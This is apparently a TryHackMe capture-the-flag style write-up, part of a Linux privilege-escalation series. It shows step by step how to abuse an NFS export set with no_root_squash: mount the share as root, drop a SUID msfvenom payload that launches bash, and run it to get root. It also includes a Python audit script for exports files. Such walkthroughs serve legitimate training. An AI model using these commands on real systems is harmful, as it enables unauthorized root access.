This time, we will try "Elevation of Privilege Using the NFS Mount no_root_squash".
The target machine is the TryHackMe room below.
"TryHackMe-Linux PrivEsc: https://tryhackme.com/room/linuxprivesc"

This article is part 9 of the series.
For the other parts of the Linux PrivEsc write-up for TryHackMe, please also see "Privilege escalation exploiting backups of history files, config files, and important files".





Preparation
First, start the target machine with Start Machine.

Once the IP address is displayed, the machine is ready.

Since this exercise is about privilege escalation, first confirm that you can connect to the target via SSH.
Connect using "user/password321" as shown in TryHackMe.
┌──(hacklab㉿hacklab)-[~/tryhackme/linuxprv]
└─$ ssh user@10.10.175.49                                            130 ⨯
user@10.10.175.49's password:
Linux debian 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC 2014 x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri May 15 06:41:23 2020 from 192.168.1.125
NFS
Files created via NFS will inherit the remote user's ID.
If the user is root and root squash is enabled (no_root_squash is not specified), the ID will be set to "nobody" instead.
Conversely, if root squash is disabled (no_root_squash is specified), note that a remote root user has the same level of access to the share as root.
Let's check the NFS export configuration on the Debian VM.
user@debian:~$ cat /etc/exports
# /etc/exports: the access control list for filesystems which may be exported
#               to NFS clients.  See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes       hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4        gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes  gss/krb5i(rw,sync,no_subtree_check)
#
/tmp *(rw,sync,insecure,no_root_squash,no_subtree_check)
#/tmp *(rw,sync,insecure,no_subtree_check)
Have you noticed that no_root_squash is specified in "/tmp"?
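To find this kind of entry on your own servers, here is an added example (not part of the original write-up or the TryHackMe room): a small Python audit that parses an exports(5) file and lists every export where remote root is not squashed. The function name audit_exports and the /srv/homes and /srv/pub sample lines are constructed for illustration.

```python
# Constructed sample: the /tmp lines are from the exports file above; the
# /srv/homes and /srv/pub lines are made up to exercise the parser.
SAMPLE_EXPORTS = """\
# /etc/exports: the access control list for filesystems which may be exported
/tmp *(rw,sync,insecure,no_root_squash,no_subtree_check)
#/tmp *(rw,sync,insecure,no_subtree_check)
/srv/homes hostname1(rw,sync,no_subtree_check) \\
           hostname2(ro,sync,no_root_squash)
/srv/pub -ro,no_root_squash 192.0.2.0/24 backup(rw,root_squash)
"""

def audit_exports(text):
    """Return (path, client, writable) for each export where root is not squashed."""
    findings = []
    # exports(5) allows a trailing backslash to continue a line.
    for line in text.replace("\\\n", " ").splitlines():
        line = line.split("#", 1)[0].strip()      # strip comments
        if not line:
            continue
        path, *fields = line.split()
        defaults = []
        for field in fields:
            if field.startswith("-"):             # per-line default options
                defaults = field[1:].split(",")
                continue
            client, _, raw = field.partition("(")
            opts = defaults + [o for o in raw.rstrip(")").split(",") if o]
            # Built-in defaults are root_squash and ro; later options win.
            root_squash, all_squash, writable = True, False, False
            for opt in opts:
                if opt in ("root_squash", "no_root_squash"):
                    root_squash = opt == "root_squash"
                elif opt in ("all_squash", "no_all_squash"):
                    all_squash = opt == "all_squash"
                elif opt in ("rw", "ro"):
                    writable = opt == "rw"
            # all_squash maps every UID, root included, to the anonymous user.
            if not root_squash and not all_squash:
                findings.append((path, client or "(any host)", writable))
    return findings

if __name__ == "__main__":
    for path, client, writable in audit_exports(SAMPLE_EXPORTS):
        mode = "rw" if writable else "ro"
        print(f"{path} -> {client} [{mode}]: remote root keeps UID 0")
```

A writable export to "*" with no_root_squash, like the /tmp entry here, is the highest-priority finding; removing no_root_squash restores the default root_squash behaviour.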
Next, we will exploit no_root_squash in "/tmp" to escalate privileges.
First, become root on the attack machine. (Root on the attack machine will then have the same privileges as root on the target machine's /tmp.)
┌──(hacklab㉿hacklab)-[~]
└─$ sudo su
┌──(root💀hacklab)-[/home/hacklab]
└─#
Next, create a mount point on the attack machine and mount /tmp.
┌──(root💀hacklab)-[/home/hacklab]
└─# mkdir /tmp/nfs
┌──(root💀hacklab)-[/home/hacklab]
└─# mount -o rw,vers=3 10.10.175.49:/tmp /tmp/nfs
Next, use msfvenom to generate a payload that calls /bin/bash.
The generated payload will be saved in /tmp/nfs.
┌──(root💀hacklab)-[/home/hacklab]
└─# msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/nfs/shell.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 48 bytes
Final size of elf file: 132 bytes
Saved as: /tmp/nfs/shell.elf
Set the SUID bit so that when a user on the target executes the file, it runs with the owner's privileges. (Root on the attack machine is treated as root on the target machine, so with the SUID bit set, other users on the target machine can also run the file with root privileges.)
┌──(root💀hacklab)-[/home/hacklab]
└─# chmod +xs /tmp/nfs/shell.elf
Once you've done this, go back to the target machine and run the shell.elf you just saved.
user@debian:~$ /tmp/shell.elf
bash-4.1# whoami
root
I successfully obtained root privileges.

Summary
This time, I tried "Privilege Elevation Using the NFS Mount no_root_squash."
Finally, did you notice that running a file with SUID permissions came up here as well?
If you are wondering what SUID permission is, please also refer to "Privilege escalation using SUID/SGID executables".
